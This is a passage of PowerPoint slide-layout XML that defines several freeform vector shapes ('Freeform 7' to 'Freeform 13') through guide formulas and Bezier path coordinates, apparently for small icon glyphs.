                    <a:pt x="13" y="59"/>
                    <a:pt x="9" y="61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5" y="57"/>
                    <a:pt x="4" y="52"/>
                    <a:pt x="4" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="33"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="13"/>
                    <a:pt x="25" y="11"/>
                    <a:pt x="29" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="9"/>
                    <a:pt x="55" y="15"/>
                    <a:pt x="67" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="28"/>
                    <a:pt x="71" y="30"/>
                    <a:pt x="72" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="32"/>
                    <a:pt x="81" y="30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5" y="34"/>
                    <a:pt x="86" y="40"/>
                    <a:pt x="86" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="58"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="72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1" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-437788"/>
              <a:ext cx="111377" cy="96578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 67 w 67"/>
                <a:gd name="T1" fmla="*/ 20 h 57"/>
                <a:gd name="T2" fmla="*/ 47 w 67"/>
                <a:gd name="T3" fmla="*/ 0 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 67"/>
                <a:gd name="T5" fmla="*/ 0 h 57"/>
                <a:gd name="T6" fmla="*/ 0 w 67"/>
                <a:gd name="T7" fmla="*/ 3 h 57"/>
                <a:gd name="T8" fmla="*/ 5 w 67"/>
                <a:gd name="T9" fmla="*/ 8 h 57"/>
                <a:gd name="T10" fmla="*/ 47 w 67"/>
                <a:gd name="T11" fmla="*/ 8 h 57"/>
                <a:gd name="T12" fmla="*/ 58 w 67"/>
                <a:gd name="T13" fmla="*/ 20 h 57"/>
                <a:gd name="T14" fmla="*/ 58 w 67"/>
                <a:gd name="T15" fmla="*/ 22 h 57"/>
                <a:gd name="T16" fmla="*/ 58 w 67"/>
                <a:gd name="T17" fmla="*/ 23 h 57"/>
                <a:gd name="T18" fmla="*/ 57 w 67"/>
                <a:gd name="T19" fmla="*/ 23 h 57"/>
                <a:gd name="T20" fmla="*/ 6 w 67"/>
                <a:gd name="T21" fmla="*/ 23 h 57"/>
                <a:gd name="T22" fmla="*/ 6 w 67"/>
                <a:gd name="T23" fmla="*/ 32 h 57"/>
                <a:gd name="T24" fmla="*/ 57 w 67"/>
                <a:gd name="T25" fmla="*/ 32 h 57"/>
                <a:gd name="T26" fmla="*/ 58 w 67"/>
                <a:gd name="T27" fmla="*/ 32 h 57"/>
                <a:gd name="T28" fmla="*/ 58 w 67"/>
                <a:gd name="T29" fmla="*/ 32 h 57"/>
                <a:gd name="T30" fmla="*/ 58 w 67"/>
                <a:gd name="T31" fmla="*/ 37 h 57"/>
                <a:gd name="T32" fmla="*/ 47 w 67"/>
                <a:gd name="T33" fmla="*/ 48 h 57"/>
                <a:gd name="T34" fmla="*/ 5 w 67"/>
                <a:gd name="T35" fmla="*/ 48 h 57"/>
                <a:gd name="T36" fmla="*/ 0 w 67"/>
                <a:gd name="T37" fmla="*/ 53 h 57"/>
                <a:gd name="T38" fmla="*/ 0 w 67"/>
                <a:gd name="T39" fmla="*/ 57 h 57"/>
                <a:gd name="T40" fmla="*/ 46 w 67"/>
                <a:gd name="T41" fmla="*/ 57 h 57"/>
                <a:gd name="T42" fmla="*/ 60 w 67"/>
                <a:gd name="T43" fmla="*/ 52 h 57"/>
                <a:gd name="T44" fmla="*/ 67 w 67"/>
                <a:gd name="T45" fmla="*/ 37 h 57"/>
                <a:gd name="T46" fmla="*/ 67 w 67"/>
                <a:gd name="T47" fmla="*/ 2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57">
                  <a:moveTo>
                    <a:pt x="67" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="9"/>
                    <a:pt x="58" y="0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2" y="8"/>
                    <a:pt x="5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3" y="8"/>
                    <a:pt x="58" y="13"/>
                    <a:pt x="58" y="20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8" y="43"/>
                    <a:pt x="53" y="48"/>
                    <a:pt x="47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0" y="51"/>
                    <a:pt x="0" y="5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1" y="57"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="60" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="48"/>
                    <a:pt x="67" y="41"/>
                    <a:pt x="67" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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7840127" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 21 h 58"/>
                <a:gd name="T2" fmla="*/ 0 w 66"/>
                <a:gd name="T3" fmla="*/ 38 h 58"/>
                <a:gd name="T4" fmla="*/ 20 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 51 w 66"/>
                <a:gd name="T7" fmla="*/ 58 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 43 h 58"/>
                <a:gd name="T10" fmla="*/ 66 w 66"/>
                <a:gd name="T11" fmla="*/ 39 h 58"/>
                <a:gd name="T12" fmla="*/ 51 w 66"/>
                <a:gd name="T13" fmla="*/ 24 h 58"/>
                <a:gd name="T14" fmla="*/ 9 w 66"/>
                <a:gd name="T15" fmla="*/ 24 h 58"/>
                <a:gd name="T16" fmla="*/ 9 w 66"/>
                <a:gd name="T17" fmla="*/ 24 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 23 h 58"/>
                <a:gd name="T20" fmla="*/ 9 w 66"/>
                <a:gd name="T21" fmla="*/ 21 h 58"/>
                <a:gd name="T22" fmla="*/ 20 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 61 w 66"/>
                <a:gd name="T25" fmla="*/ 9 h 58"/>
                <a:gd name="T26" fmla="*/ 66 w 66"/>
                <a:gd name="T27" fmla="*/ 4 h 58"/>
                <a:gd name="T28" fmla="*/ 66 w 66"/>
                <a:gd name="T29" fmla="*/ 0 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 0 h 58"/>
                <a:gd name="T32" fmla="*/ 0 w 66"/>
                <a:gd name="T33" fmla="*/ 21 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 33 h 58"/>
                <a:gd name="T36" fmla="*/ 51 w 66"/>
                <a:gd name="T37" fmla="*/ 33 h 58"/>
                <a:gd name="T38" fmla="*/ 57 w 66"/>
                <a:gd name="T39" fmla="*/ 39 h 58"/>
                <a:gd name="T40" fmla="*/ 57 w 66"/>
                <a:gd name="T41" fmla="*/ 43 h 58"/>
                <a:gd name="T42" fmla="*/ 51 w 66"/>
                <a:gd name="T43" fmla="*/ 49 h 58"/>
                <a:gd name="T44" fmla="*/ 20 w 66"/>
                <a:gd name="T45" fmla="*/ 49 h 58"/>
                <a:gd name="T46" fmla="*/ 9 w 66"/>
                <a:gd name="T47" fmla="*/ 38 h 58"/>
                <a:gd name="T48" fmla="*/ 9 w 66"/>
                <a:gd name="T49" fmla="*/ 33 h 58"/>
                <a:gd name="T50" fmla="*/ 9 w 66"/>
                <a:gd name="T51" fmla="*/ 3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8">
                  <a:moveTo>
                    <a:pt x="0" y="21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49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20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9" y="58"/>
                    <a:pt x="66" y="51"/>
                    <a:pt x="66" y="43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31"/>
                    <a:pt x="59" y="24"/>
                    <a:pt x="51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14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20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3" y="9"/>
                    <a:pt x="66" y="7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1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="33"/>
                    <a:pt x="57" y="35"/>
                    <a:pt x="57" y="39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7"/>
                    <a:pt x="54" y="49"/>
                    <a:pt x="5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4" y="49"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="9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7961629" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 38 h 58"/>
                <a:gd name="T2" fmla="*/ 20 w 66"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 46 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 66 w 66"/>
                <a:gd name="T7" fmla="*/ 38 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 21 h 58"/>
                <a:gd name="T10" fmla="*/ 46 w 66"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 20 w 66"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 66"/>
                <a:gd name="T15" fmla="*/ 21 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 66"/>
                <a:gd name="T17" fmla="*/ 38 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 21 h 58"/>
                <a:gd name="T20" fmla="*/ 20 w 66"/>
                <a:gd name="T21" fmla="*/ 9 h 58"/>
                <a:gd name="T22" fmla="*/ 46 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 57 w 66"/>
                <a:gd name="T25" fmla="*/ 21 h 58"/>
                <a:gd name="T26" fmla="*/ 57 w 66"/>
                <a:gd name="T27" fmla="*/ 38 h 58"/>
                <a:gd name="T28" fmla="*/ 46 w 66"/>
                <a:gd name="T29" fmla="*/ 49 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 49 h 58"/>
                <a:gd name="T32" fmla="*/ 9 w 66"/>
                <a:gd name="T33" fmla="*/ 38 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 2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58">
                  <a:moveTo>
                    <a:pt x="0" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20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57" y="58"/>
                    <a:pt x="66" y="49"/>
                    <a:pt x="66" y="38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9"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="4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1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="38"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20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52" y="9"/>
                    <a:pt x="57" y="14"/>
                    <a:pt x="57" y="21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44"/>
                    <a:pt x="52" y="49"/>
                    <a:pt x="46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4" y="49"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="9" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9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4" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-439346"/>
              <a:ext cx="115271" cy="30376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 69"/>
                <a:gd name="T1" fmla="*/ 18 h 18"/>
                <a:gd name="T2" fmla="*/ 13 w 69"/>
                <a:gd name="T3" fmla="*/ 15 h 18"/>
                <a:gd name="T4" fmla="*/ 17 w 69"/>
                <a:gd name="T5" fmla="*/ 11 h 18"/>
                <a:gd name="T6" fmla="*/ 19 w 69"/>
                <a:gd name="T7" fmla="*/ 9 h 18"/>
                <a:gd name="T8" fmla="*/ 26 w 69"/>
                <a:gd name="T9" fmla="*/ 8 h 18"/>
                <a:gd name="T10" fmla="*/ 45 w 69"/>
                <a:gd name="T11" fmla="*/ 8 h 18"/>
                <a:gd name="T12" fmla="*/ 49 w 69"/>
                <a:gd name="T13" fmla="*/ 9 h 18"/>
                <a:gd name="T14" fmla="*/ 52 w 69"/>
                <a:gd name="T15" fmla="*/ 11 h 18"/>
                <a:gd name="T16" fmla="*/ 56 w 69"/>
                <a:gd name="T17" fmla="*/ 15 h 18"/>
                <a:gd name="T18" fmla="*/ 63 w 69"/>
                <a:gd name="T19" fmla="*/ 18 h 18"/>
                <a:gd name="T20" fmla="*/ 68 w 69"/>
                <a:gd name="T21" fmla="*/ 18 h 18"/>
                <a:gd name="T22" fmla="*/ 69 w 69"/>
                <a:gd name="T23" fmla="*/ 18 h 18"/>
                <a:gd name="T24" fmla="*/ 69 w 69"/>
                <a:gd name="T25" fmla="*/ 11 h 18"/>
                <a:gd name="T26" fmla="*/ 68 w 69"/>
                <a:gd name="T27" fmla="*/ 11 h 18"/>
                <a:gd name="T28" fmla="*/ 63 w 69"/>
                <a:gd name="T29" fmla="*/ 11 h 18"/>
                <a:gd name="T30" fmla="*/ 60 w 69"/>
                <a:gd name="T31" fmla="*/ 9 h 18"/>
                <a:gd name="T32" fmla="*/ 57 w 69"/>
                <a:gd name="T33" fmla="*/ 4 h 18"/>
                <a:gd name="T34" fmla="*/ 54 w 69"/>
                <a:gd name="T35" fmla="*/ 2 h 18"/>
                <a:gd name="T36" fmla="*/ 45 w 69"/>
                <a:gd name="T37" fmla="*/ 0 h 18"/>
                <a:gd name="T38" fmla="*/ 22 w 69"/>
                <a:gd name="T39" fmla="*/ 0 h 18"/>
                <a:gd name="T40" fmla="*/ 12 w 69"/>
                <a:gd name="T41" fmla="*/ 4 h 18"/>
                <a:gd name="T42" fmla="*/ 8 w 69"/>
                <a:gd name="T43" fmla="*/ 9 h 18"/>
                <a:gd name="T44" fmla="*/ 1 w 69"/>
                <a:gd name="T45" fmla="*/ 11 h 18"/>
                <a:gd name="T46" fmla="*/ 0 w 69"/>
                <a:gd name="T47" fmla="*/ 11 h 18"/>
                <a:gd name="T48" fmla="*/ 0 w 69"/>
                <a:gd name="T49" fmla="*/ 18 h 18"/>
                <a:gd name="T50" fmla="*/ 1 w 69"/>
                <a:gd name="T51" fmla="*/ 18 h 18"/>
                <a:gd name="T52" fmla="*/ 6 w 69"/>
                <a:gd name="T5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18">
                  <a:moveTo>
                    <a:pt x="6" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="18"/>
                    <a:pt x="11" y="17"/>
                    <a:pt x="13" y="15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8" y="9"/>
                    <a:pt x="19" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="8"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="26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6" y="8"/>
                    <a:pt x="48" y="8"/>
                    <a:pt x="49" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="9"/>
                    <a:pt x="51" y="10"/>
                    <a:pt x="52" y="11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8" y="17"/>
                    <a:pt x="60" y="18"/>
                    <a:pt x="63" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="18"/>
                    <a:pt x="66" y="18"/>
                    <a:pt x="68" y="18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6" y="11"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="63" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="61" y="10"/>
                    <a:pt x="60" y="9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6" y="3"/>
                    <a:pt x="55" y="2"/>
                    <a:pt x="54" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="49" y="0"/>
                    <a:pt x="4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4" y="2"/>
                    <a:pt x="12" y="4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1"/>
                    <a:pt x="5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3" y="18"/>
                    <a:pt x="4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5" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-407413"/>
              <a:ext cx="115271" cy="69319"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 69"/>
                <a:gd name="T1" fmla="*/ 33 h 41"/>
                <a:gd name="T2" fmla="*/ 38 w 69"/>
                <a:gd name="T3" fmla="*/ 23 h 41"/>
                <a:gd name="T4" fmla="*/ 62 w 69"/>
                <a:gd name="T5" fmla="*/ 23 h 41"/>
                <a:gd name="T6" fmla="*/ 67 w 69"/>
                <a:gd name="T7" fmla="*/ 19 h 41"/>
                <a:gd name="T8" fmla="*/ 67 w 69"/>
                <a:gd name="T9" fmla="*/ 15 h 41"/>
                <a:gd name="T10" fmla="*/ 38 w 69"/>
                <a:gd name="T11" fmla="*/ 15 h 41"/>
                <a:gd name="T12" fmla="*/ 38 w 69"/>
                <a:gd name="T13" fmla="*/ 8 h 41"/>
                <a:gd name="T14" fmla="*/ 62 w 69"/>
                <a:gd name="T15" fmla="*/ 8 h 41"/>
                <a:gd name="T16" fmla="*/ 67 w 69"/>
                <a:gd name="T17" fmla="*/ 3 h 41"/>
                <a:gd name="T18" fmla="*/ 67 w 69"/>
                <a:gd name="T19" fmla="*/ 0 h 41"/>
                <a:gd name="T20" fmla="*/ 2 w 69"/>
                <a:gd name="T21" fmla="*/ 0 h 41"/>
                <a:gd name="T22" fmla="*/ 2 w 69"/>
                <a:gd name="T23" fmla="*/ 8 h 41"/>
                <a:gd name="T24" fmla="*/ 30 w 69"/>
                <a:gd name="T25" fmla="*/ 8 h 41"/>
                <a:gd name="T26" fmla="*/ 30 w 69"/>
                <a:gd name="T27" fmla="*/ 15 h 41"/>
                <a:gd name="T28" fmla="*/ 2 w 69"/>
                <a:gd name="T29" fmla="*/ 15 h 41"/>
                <a:gd name="T30" fmla="*/ 2 w 69"/>
                <a:gd name="T31" fmla="*/ 23 h 41"/>
                <a:gd name="T32" fmla="*/ 30 w 69"/>
                <a:gd name="T33" fmla="*/ 23 h 41"/>
                <a:gd name="T34" fmla="*/ 30 w 69"/>
                <a:gd name="T35" fmla="*/ 33 h 41"/>
                <a:gd name="T36" fmla="*/ 0 w 69"/>
                <a:gd name="T37" fmla="*/ 33 h 41"/>
                <a:gd name="T38" fmla="*/ 0 w 69"/>
                <a:gd name="T39" fmla="*/ 41 h 41"/>
                <a:gd name="T40" fmla="*/ 65 w 69"/>
                <a:gd name="T41" fmla="*/ 41 h 41"/>
                <a:gd name="T42" fmla="*/ 69 w 69"/>
                <a:gd name="T43" fmla="*/ 37 h 41"/>
                <a:gd name="T44" fmla="*/ 69 w 69"/>
                <a:gd name="T45" fmla="*/ 33 h 41"/>
                <a:gd name="T46" fmla="*/ 38 w 69"/>
                <a:gd name="T47" fmla="*/ 3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41">
                  <a:moveTo>
                    <a:pt x="38" y="33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65" y="23"/>
                    <a:pt x="67" y="21"/>
                    <a:pt x="67" y="19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5" y="8"/>
                    <a:pt x="67" y="6"/>
                    <a:pt x="67" y="3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7" y="41"/>
                    <a:pt x="69" y="39"/>
                    <a:pt x="69" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3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6" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-439346"/>
              <a:ext cx="112935" cy="27260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 68"/>
                <a:gd name="T1" fmla="*/ 13 h 16"/>
                <a:gd name="T2" fmla="*/ 8 w 68"/>
                <a:gd name="T3" fmla="*/ 11 h 16"/>
                <a:gd name="T4" fmla="*/ 13 w 68"/>
                <a:gd name="T5" fmla="*/ 10 h 16"/>
                <a:gd name="T6" fmla="*/ 57 w 68"/>
                <a:gd name="T7" fmla="*/ 10 h 16"/>
                <a:gd name="T8" fmla="*/ 60 w 68"/>
                <a:gd name="T9" fmla="*/ 12 h 16"/>
                <a:gd name="T10" fmla="*/ 61 w 68"/>
                <a:gd name="T11" fmla="*/ 13 h 16"/>
                <a:gd name="T12" fmla="*/ 61 w 68"/>
                <a:gd name="T13" fmla="*/ 16 h 16"/>
                <a:gd name="T14" fmla="*/ 68 w 68"/>
                <a:gd name="T15" fmla="*/ 16 h 16"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 12 h 16"/>
                <a:gd name="T18" fmla="*/ 65 w 68"/>
                <a:gd name="T19" fmla="*/ 6 h 16"/>
                <a:gd name="T20" fmla="*/ 57 w 68"/>
                <a:gd name="T21" fmla="*/ 4 h 16"/>
                <a:gd name="T22" fmla="*/ 38 w 68"/>
                <a:gd name="T23" fmla="*/ 4 h 16"/>
                <a:gd name="T24" fmla="*/ 38 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 16"/>
                <a:gd name="T26" fmla="*/ 30 w 68"/>
                <a:gd name="T27" fmla="*/ 0 h 16"/>
                <a:gd name="T28" fmla="*/ 30 w 68"/>
                <a:gd name="T29" fmla="*/ 4 h 16"/>
                <a:gd name="T30" fmla="*/ 10 w 68"/>
                <a:gd name="T31" fmla="*/ 4 h 16"/>
                <a:gd name="T32" fmla="*/ 3 w 68"/>
                <a:gd name="T33" fmla="*/ 6 h 16"/>
                <a:gd name="T34" fmla="*/ 0 w 68"/>
                <a:gd name="T35" fmla="*/ 12 h 16"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 16 h 16"/>
                <a:gd name="T38" fmla="*/ 7 w 68"/>
                <a:gd name="T39" fmla="*/ 16 h 16"/>
                <a:gd name="T40" fmla="*/ 7 w 68"/>
                <a:gd name="T41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" h="16">
                  <a:moveTo>
                    <a:pt x="7" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="12"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="11"/>
                    <a:pt x="11" y="10"/>
                    <a:pt x="13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9" y="11"/>
                    <a:pt x="60" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="12"/>
                    <a:pt x="61" y="13"/>
                    <a:pt x="61" y="13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9"/>
                    <a:pt x="67" y="7"/>
                    <a:pt x="65" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="4"/>
                    <a:pt x="61" y="4"/>
                    <a:pt x="5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7" y="4"/>
                    <a:pt x="5" y="4"/>
                    <a:pt x="3" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="0" y="9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7" y="16"/>
                    <a:pt x="7" y="16"/>
                    <a:pt x="7" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7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7" name="Freeform 13"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-410528"/>
              <a:ext cx="112935" cy="70876"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 68"/>
                <a:gd name="T1" fmla="*/ 36 h 42"/>
                <a:gd name="T2" fmla="*/ 53 w 68"/>
                <a:gd name="T3" fmla="*/ 35 h 42"/>
                <a:gd name="T4" fmla="*/ 43 w 68"/>
                <a:gd name="T5" fmla="*/ 33 h 42"/>
                <a:gd name="T6" fmla="*/ 55 w 68"/>
                <a:gd name="T7" fmla="*/ 29 h 42"/>
                <a:gd name="T8" fmla="*/ 58 w 68"/>
                <a:gd name="T9" fmla="*/ 26 h 42"/>
                <a:gd name="T10" fmla="*/ 62 w 68"/>
                <a:gd name="T11" fmla="*/ 16 h 42"/>
                <a:gd name="T12" fmla="*/ 62 w 68"/>
                <a:gd name="T13" fmla="*/ 12 h 42"/>
                <a:gd name="T14" fmla="*/ 65 w 68"/>
                <a:gd name="T15" fmla="*/ 12 h 42"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 8 h 42"/>
                <a:gd name="T18" fmla="*/ 68 w 68"/>
                <a:gd name="T19" fmla="*/ 5 h 42"/>
                <a:gd name="T20" fmla="*/ 62 w 68"/>
                <a:gd name="T21" fmla="*/ 5 h 42"/>
                <a:gd name="T22" fmla="*/ 62 w 68"/>
                <a:gd name="T23" fmla="*/ 0 h 42"/>
                <a:gd name="T24" fmla="*/ 55 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 42"/>
                <a:gd name="T26" fmla="*/ 55 w 68"/>
                <a:gd name="T27" fmla="*/ 5 h 42"/>
                <a:gd name="T28" fmla="*/ 13 w 68"/>
                <a:gd name="T29" fmla="*/ 5 h 42"/>
                <a:gd name="T30" fmla="*/ 13 w 68"/>
                <a:gd name="T31" fmla="*/ 0 h 42"/>
                <a:gd name="T32" fmla="*/ 6 w 68"/>
                <a:gd name="T33" fmla="*/ 0 h 42"/>
                <a:gd name="T34" fmla="*/ 6 w 68"/>
                <a:gd name="T35" fmla="*/ 5 h 42"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 5 h 42"/>
                <a:gd name="T38" fmla="*/ 0 w 68"/>
                <a:gd name="T39" fmla="*/ 12 h 42"/>
                <a:gd name="T40" fmla="*/ 6 w 68"/>
                <a:gd name="T41" fmla="*/ 12 h 42"/>
                <a:gd name="T42" fmla="*/ 6 w 68"/>
                <a:gd name="T43" fmla="*/ 18 h 42"/>
                <a:gd name="T44" fmla="*/ 9 w 68"/>
                <a:gd name="T45" fmla="*/ 25 h 42"/>
                <a:gd name="T46" fmla="*/ 16 w 68"/>
                <a:gd name="T47" fmla="*/ 30 h 42"/>
                <a:gd name="T48" fmla="*/ 25 w 68"/>
                <a:gd name="T49" fmla="*/ 33 h 42"/>
                <a:gd name="T50" fmla="*/ 12 w 68"/>
                <a:gd name="T51" fmla="*/ 35 h 42"/>
                <a:gd name="T52" fmla="*/ 0 w 68"/>
                <a:gd name="T53" fmla="*/ 36 h 42"/>
                <a:gd name="T54" fmla="*/ 0 w 68"/>
                <a:gd name="T55" fmla="*/ 36 h 42"/>
                <a:gd name="T56" fmla="*/ 0 w 68"/>
                <a:gd name="T57" fmla="*/ 42 h 42"/>
                <a:gd name="T58" fmla="*/ 0 w 68"/>
                <a:gd name="T59" fmla="*/ 42 h 42"/>
                <a:gd name="T60" fmla="*/ 27 w 68"/>
                <a:gd name="T61" fmla="*/ 39 h 42"/>
                <a:gd name="T62" fmla="*/ 34 w 68"/>
                <a:gd name="T63" fmla="*/ 37 h 42"/>
                <a:gd name="T64" fmla="*/ 41 w 68"/>
                <a:gd name="T65" fmla="*/ 39 h 42"/>
                <a:gd name="T66" fmla="*/ 54 w 68"/>
                <a:gd name="T67" fmla="*/ 42 h 42"/>
                <a:gd name="T68" fmla="*/ 68 w 68"/>
                <a:gd name="T69" fmla="*/ 42 h 42"/>
                <a:gd name="T70" fmla="*/ 68 w 68"/>
                <a:gd name="T71" fmla="*/ 42 h 42"/>
                <a:gd name="T72" fmla="*/ 68 w 68"/>
                <a:gd name="T73" fmla="*/ 36 h 42"/>
                <a:gd name="T74" fmla="*/ 68 w 68"/>
                <a:gd name="T75" fmla="*/ 36 h 42"/>
                <a:gd name="T76" fmla="*/ 64 w 68"/>
                <a:gd name="T77" fmla="*/ 36 h 42"/>
                <a:gd name="T78" fmla="*/ 55 w 68"/>
                <a:gd name="T79" fmla="*/ 16 h 42"/>
                <a:gd name="T80" fmla="*/ 49 w 68"/>
                <a:gd name="T81" fmla="*/ 24 h 42"/>
                <a:gd name="T82" fmla="*/ 34 w 68"/>
                <a:gd name="T83" fmla="*/ 30 h 42"/>
                <a:gd name="T84" fmla="*/ 19 w 68"/>
                <a:gd name="T85" fmla="*/ 24 h 42"/>
                <a:gd name="T86" fmla="*/ 15 w 68"/>
                <a:gd name="T87" fmla="*/ 21 h 42"/>
                <a:gd name="T88" fmla="*/ 14 w 68"/>
                <a:gd name="T89" fmla="*/ 17 h 42"/>
                <a:gd name="T90" fmla="*/ 13 w 68"/>
                <a:gd name="T91" fmla="*/ 12 h 42"/>
                <a:gd name="T92" fmla="*/ 55 w 68"/>
